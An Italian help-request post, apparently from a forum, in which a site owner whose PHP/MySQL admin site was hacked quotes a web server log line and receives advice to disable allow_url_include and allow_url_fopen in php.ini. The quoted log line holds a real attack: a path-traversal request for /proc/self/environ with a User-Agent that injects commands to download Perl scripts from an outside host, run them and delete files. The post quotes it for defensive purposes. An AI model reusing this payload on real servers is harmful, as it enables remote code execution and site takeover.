Sono stato attaccato su un server host condiviso e hanno detto che dovevo configurare il mio file php.ini correttamente.
Ho un piccolo programma PHP / MySQL con una funzione di registrazione, un piccolo sito di amministrazione.
Tuttavia, qualcuno l'ha hackerato. Qualsiasi aiuto sarebbe molto apprezzato con php.ini.
Ecco cosa ho ottenuto dal provider di webhost:
121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http ://some . thesome . com/etc/cup.txt;perl cup.txt;rm -rf .txt;wget http ://some . thesome . com/etc/update.txt;perl update.txt;rm -rf .txt'); echo \"#j13mb0t\"; ?>"
Poiché lo script injection attacca il codice del sito stesso, è in grado di evitare completamente la sicurezza del server web. Sfortunatamente, alcuni sistemi di gestione dei contenuti (specialmente le versioni più vecchie di Joomla) sono estremamente suscettibili a questa forma di attacco.
Un modo semplice per rimuovere la possibilità per gli aggressori di utilizzare questo metodo è di aggiungere un file php.ini al livello più alto del sito web con i seguenti contenuti - essere consapevoli che il sito Web necessiterà di test in seguito per garantire che nessuna modifica delle azioni di scripting del sito Web legittima è stata influenzata dalla modifica:
Le direttive php.ini sono:
allow_url_include = "0"
allow_url_fopen = "0"